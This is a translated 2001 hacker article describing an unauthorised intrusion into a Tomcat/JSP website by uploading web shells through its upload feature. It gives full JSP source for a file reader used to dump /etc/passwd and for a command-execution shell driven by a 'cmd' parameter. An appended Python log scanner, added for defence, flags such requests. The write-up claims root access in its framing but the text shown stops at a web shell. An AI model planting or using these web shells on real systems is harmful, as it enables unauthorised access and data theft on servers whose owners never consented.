Author: lovehacker
Contact: lovehacker@263.net
Website: http://www.chinansl.com

Copyright UNITA Information Technology Co., Ltd. Reprinting is allowed, but the integrity of the article must be maintained.

This article describes how root privileges were obtained on a FreeBSD 4.0 host through a web intrusion. The article is mainly intended for education. I hope that readers do not use the methods and programs in this article to harm network security.

Quite by chance, I came across a website whose pages looked fresh and pleasant. The website was developed in JSP and, out of personal interest, I decided to look at the security of the system.

    telnet www.target.com 8080
    GET /chinansl HTTP/1.1
    [Enter]
    [Enter]

It returned the following:

    HTTP/1.0 404 Not Found
    Date: Sun, 08 Jul 2001 07:49:13 GMT
    Servlet-Engine: Tomcat Web Server/3.1 (JSP 1.1; Servlet 2.2; Java 1.2.2; Linux 2.2.12 i386; java.vendor=Blackdown Java-Linux Team)
    Content-Language: en
    Content-Type: text/html
    Status: 404

After a few sips of coffee, I wrote this little thing:

    <%@ page import="java.io.*" %>
    <%
    // Reads the file named by the "file" request parameter and prints it line by line.
    String file = request.getParameter("file");
    String str = "";
    FileInputStream fis = null;
    DataInputStream dis = null;
    try {
        fis = new FileInputStream(file);
        dis = new DataInputStream(fis);
        while (true) {
            try {
                str = dis.readLine();
            } catch (Exception e) { }
            if (str == null) break;
            out.print(str + "<br>");
        }
    } catch (IOException e) { }
    %>

I uploaded this JSP to the target's web directory through the site's upload function, then requested:

    http://target:8080/upload/test.jsp?file=/etc/passwd

Hehe, the password file came back. I only looked at "/etc/passwd" and did not look at "/etc/shadow", considering that a web server is usually started under the nobody identity. (Failure)

Next came the tedious process of guessing passwords, with no success. Forget it, I'll just take a different tack. Anyway, I now had the equivalent of a shell: if I couldn't guess the password, then IE would be my shell environment! I wrote:

    <%@ page import="java.io.*" %>
    <%
    // Runs the program named by the "cmd" request parameter and prints its output.
    try {
        String cmd = request.getParameter("cmd");
        Process child = Runtime.getRuntime().exec(cmd);
        InputStream in = child.getInputStream();
        int c;
        while ((c = in.read()) != -1) {
            out.print((char) c);
        }
        in.close();
        try {
            child.waitFor();
        } catch (InterruptedException e) {
            e.printStackTrace();
        }
    } catch (IOException e) {
        System.err.println(e);
    }
    %>

I then uploaded this JSP through the upload function as well. Oh, now I have a shell.
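
Seen from the defender's side, both requests above leave the same trace: a JSP being run out of the directory that holds user uploads. The following is an added example, not part of the original article, that flags such requests in an access log. It assumes Common Log Format and uploads served under /upload/; the function names and the sample log lines are constructed for illustration.

```python
import re
from urllib.parse import parse_qsl, unquote

UPLOAD_DIRS = ("/upload/",)     # assumption: where the application stores uploads
SCRIPT_EXT = (".jsp", ".jspx")  # extensions the servlet container compiles and runs
CLF = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] '
                 r'"(?P<method>[A-Z]+) (?P<target>\S+)[^"]*" (?P<status>\d{3})')

def classify(line):
    """Return a finding for a request that runs a script from an upload dir."""
    m = CLF.match(line)
    if m is None:
        return None
    raw_path, _, query = m["target"].partition("?")
    # Decode %xx and drop ;name=value path parameters before matching.
    path = unquote(raw_path).split(";", 1)[0].lower()
    if not (any(d in path for d in UPLOAD_DIRS) and path.endswith(SCRIPT_EXT)):
        return None
    reasons = ["script requested from upload directory"]
    for name, value in parse_qsl(query, keep_blank_values=True):
        if value.startswith("/") or ".." in value:
            reasons.append(f"parameter '{name}' carries a filesystem path")
    # Status 200 means the container served (and so executed) the script.
    return {"ip": m["ip"], "path": path,
            "served": m["status"] == "200", "reasons": reasons}

# Constructed sample lines in Common Log Format (not from the original page).
SAMPLE_LOG = """\
192.0.2.10 - - [08/Jul/2001:07:49:13 +0000] "GET /index.jsp HTTP/1.0" 200 5120
192.0.2.44 - - [08/Jul/2001:07:52:01 +0000] "GET /upload/photo.gif HTTP/1.0" 200 20480
198.51.100.7 - - [08/Jul/2001:08:01:30 +0000] "GET /upload/test.jsp?file=/etc/passwd HTTP/1.0" 200 1743
198.51.100.7 - - [08/Jul/2001:08:05:12 +0000] "GET /upload/a.jsp;x=1?cmd=uname HTTP/1.0" 404 210
"""

def scan(log_text):
    """Classify every line and keep only the findings."""
    return [f for f in map(classify, log_text.splitlines()) if f]

if __name__ == "__main__":
    for finding in scan(SAMPLE_LOG):
        print(finding)
```

A finding with "served" set means the container executed an uploaded file, which points at the underlying fix: the upload handler should restrict file types and store uploads where the servlet engine will not run them.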